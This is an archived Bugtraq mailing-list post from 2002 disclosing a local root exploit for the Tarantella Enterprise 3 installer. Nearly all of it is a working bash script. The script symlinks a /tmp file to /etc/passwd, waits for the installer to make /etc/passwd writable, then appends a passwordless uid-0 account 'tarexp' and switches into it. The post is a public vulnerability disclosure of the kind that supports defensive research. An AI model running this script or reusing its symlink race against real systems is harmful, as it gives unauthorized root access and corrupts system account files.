[24410] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Exploit for Tarantella Enterprise installation (bid 4115)

daemon@ATHENA.MIT.EDU (Larry W. Cashdollar)
Mon Feb 25 19:31:37 2002

Date: Sun, 24 Feb 2002 08:59:38 -0500 (EST)
From: "Larry W. Cashdollar" <lwc@vapid.dhs.org>
To: <bugtraq@securityfocus.com>
Cc: <vuldb@securityfocus.com>
Message-ID: <20020224085517.C9867-100000@vapid.dhs.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

Had some idle time and wrote this, tested under Linux.

#!/bin/bash
#Larry W. Cashdollar  lwc@vapid.dhs.org
#http://vapid.dhs.org
#Tarantella Enterprise 3 symlink local root Installation exploit
#For educational purposes only.
#tested on Linux.  run and wait.

echo "Creating symlink."

/bin/ln -s /etc/passwd /tmp/spinning

echo "Waiting for tarantella installation."

while true
do
echo -n .
if [ -w /etc/passwd ]
then
	echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
        su - tarexp
        exit
fi
done


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[24410] in bugtraq

Exploit for Tarantella Enterprise installation (bid 4115)

daemon@ATHENA.MIT.EDU (Larry W. Cashdollar)Mon Feb 25 19:31:37 2002

daemon@ATHENA.MIT.EDU (Larry W. Cashdollar)
Mon Feb 25 19:31:37 2002